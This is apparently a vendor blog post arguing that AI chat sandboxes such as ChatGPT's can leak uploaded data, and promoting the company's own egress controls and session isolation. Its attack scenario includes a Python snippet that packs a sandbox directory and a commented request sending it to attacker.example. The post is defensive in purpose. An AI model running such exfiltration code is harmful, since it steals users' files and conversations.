Why your AI Sandbox might be leaking data, and how we built DwellFi differently
Last week, Gareth Wright posted on LinkedIn about a concerning observation: OpenAI's ChatGPT sandbox allows users to upload and execute scripts—and while most outbound internet access is restricted, you can still exfiltrate data over HTTP.
We had to test it ourselves.
Our Test Results
| Platform | Script Upload | Script Execution | HTTP Exfiltration |
| --- | --- | --- | --- |
| ChatGPT | Allowed | Allowed | Possible |
| Perplexity | Allowed | Allowed | Possible |
| DwellFi | Blocked | Blocked | Blocked |
This Isn't Theoretical—There Are Actual CVEs
Some might dismiss this as fear-mongering. The evidence says otherwise:
CVE-2025-59532: OpenAI Codex CLI Vulnerability
OpenAI's Codex CLI had a critical security vulnerability that allowed arbitrary file writes and command execution due to improper sandbox configuration. This wasn't a hypothetical—it was a documented CVE.
Perplexity Comet Browser Security Audit Failures
Security researchers from Brave and Guardio conducted audits of Perplexity's Comet browser and found significant vulnerabilities including susceptibility to phishing scams and malicious code injection.
OpenAI's Own Admission
Reuters reported that OpenAI has acknowledged its upcoming AI models could pose "high" cybersecurity risks, with potential for developing zero-day remote exploits.
"It's Just a Sandbox"—Why That Argument Doesn't Hold
Some commenters on the original post argued this is expected behavior. After all, a sandbox is isolated, right?
Here's the problem with that logic:
What's Actually in That Sandbox?
- Uploaded documents (contracts, financials, client data)
- Custom prompts (proprietary workflows, system instructions)
- Generated outputs (analysis, recommendations, code)
- Session context (conversation history with sensitive details)
When a user uploads a script that zips /home/oai and sends it to an external endpoint, they're not exfiltrating OpenAI's data. They're exfiltrating yours.
For consumer use? Maybe acceptable.
For enterprise financial services? Absolutely not.
The Enterprise AI Security Gap
Most organizations adopting AI are focused on:
- Model accuracy
- Integration capabilities
- Cost per token
- Compliance certifications
What They're NOT Asking:
- Can users execute arbitrary code in our environment?
- What data is accessible during script execution?
- Are there egress controls on sandbox network access?
- How is session data isolated between users and conversations?
This isn't hypothetical. It's a concrete attack vector.
Attack Scenario
An employee uploads a "helpful automation script" they found online. That script:
- Accesses all files in the sandbox
- Packages them with conversation history
- Sends them to an external server
- Returns a benign response
The user sees: "Script executed successfully!"
You see: Nothing. Until the breach report.
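The scenario above needs remarkably little code. As an illustration only (the endpoint is hypothetical, and everything here uses the Python standard library), the packaging half of such a script might look like this:

```python
import io
import tarfile


def package_sandbox(root: str) -> bytes:
    """Pack every file under `root` into an in-memory gzipped tar archive."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        tar.add(root, arcname="sandbox")
    return buf.getvalue()


# The exfiltration half is a single HTTP request to an attacker-controlled
# host (hypothetical URL) -- no special privileges required:
#
#   import urllib.request
#   req = urllib.request.Request("https://attacker.example/upload",
#                                data=package_sandbox("/home/oai"))
#   urllib.request.urlopen(req)
```

A dozen lines, buried inside a longer "automation" script, is all it takes when the sandbox permits both file access and outbound HTTP.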
How DwellFi Approaches Sandbox Security
When we built DwellFi for financial services, we started with a simple assumption:
Every user is a potential threat vector.
Not because we don't trust people—because that's how you build secure enterprise systems.
Our Architecture
1. No Arbitrary Code Execution
Users cannot upload or execute scripts in environments that touch session data. Period.
2. Egress-Only Allow Lists
Network access from processing environments is restricted to explicitly approved endpoints. No HTTP callbacks to arbitrary domains.
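In a default-deny model, the check is simple: a request either targets an approved host or it doesn't go out. A minimal sketch of that policy (the allow-listed hostnames are hypothetical, not DwellFi's actual configuration):

```python
from urllib.parse import urlparse

# Hypothetical allow list: the only hosts the processing environment
# may reach. Everything else is denied by default.
EGRESS_ALLOW_LIST = {
    "api.internal.example.com",
    "models.internal.example.com",
}


def egress_permitted(url: str) -> bool:
    """Default-deny egress check: permit only explicitly approved hosts."""
    host = urlparse(url).hostname
    return host in EGRESS_ALLOW_LIST
```

Under this policy, `egress_permitted("https://attacker.example/upload")` is false, so the HTTP callback in the earlier attack scenario never leaves the environment.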
3. Session Isolation
Each conversation exists in a cryptographically isolated context. Even if code execution were possible, cross-session data access is architecturally impossible.
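One common way to back this kind of isolation is key derivation: each session gets its own encryption key, so data sealed under one session's key is unreadable from any other. A sketch of the idea using an HMAC-based derivation (standard library only; this is an illustration of the pattern, not DwellFi's actual scheme):

```python
import hashlib
import hmac


def session_key(master_key: bytes, session_id: str) -> bytes:
    """Derive a distinct 32-byte key per session from a master key.

    Ciphertext produced under one session's key cannot be decrypted
    with another session's key, enforcing isolation cryptographically
    rather than by access-control convention alone.
    """
    return hmac.new(master_key, session_id.encode(), hashlib.sha256).digest()
```

Because the derivation is deterministic per session but unpredictable across sessions, compromising one conversation's key reveals nothing about any other's.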
4. Audit Everything
Every file operation, network request, and data access is logged and attributable. Anomalous behavior triggers immediate alerts.
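Attributable logging plus a trigger rule is conceptually small. A toy sketch (field names and the alert rule are illustrative assumptions, not DwellFi's production schema):

```python
import datetime
import json


def audit_event(actor: str, action: str, resource: str) -> str:
    """Emit one structured, attributable audit record per operation."""
    record = {
        "ts": datetime.datetime.now(datetime.timezone.utc).isoformat(),
        "actor": actor,
        "action": action,
        "resource": resource,
    }
    return json.dumps(record)


def should_alert(record: dict) -> bool:
    # Toy anomaly rule: any outbound network action is worth flagging in
    # an environment that should make no arbitrary outbound requests.
    return record["action"] == "network.request"
```

The point isn't the specific rule, it's that every operation produces a record tied to an identity, so "Nothing. Until the breach report." becomes "an alert within seconds."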
Questions to Ask Your AI Vendor
If you're evaluating AI platforms for enterprise use, add these to your security review:
- Can users execute arbitrary code in the processing environment?
- What data is accessible during code/script execution?
- What egress controls exist on sandbox network access?
- How is session data isolated between users?
- What audit trails exist for data access and network activity?
If the answers are vague—or worse, "we trust our sandbox isolation"—that's a red flag.
AI sandbox security isn't a theoretical concern. It's a concrete vulnerability that exists in production systems used by millions—with documented CVEs to prove it.
For consumer applications, the risk/convenience tradeoff might be acceptable.
For enterprise financial services—where a single data breach can mean regulatory action, client loss, and reputational damage—it's not.
Security isn't a feature you add later. It's architecture you build from day one.
DwellFi is an AI-powered financial technology platform built for enterprise security requirements.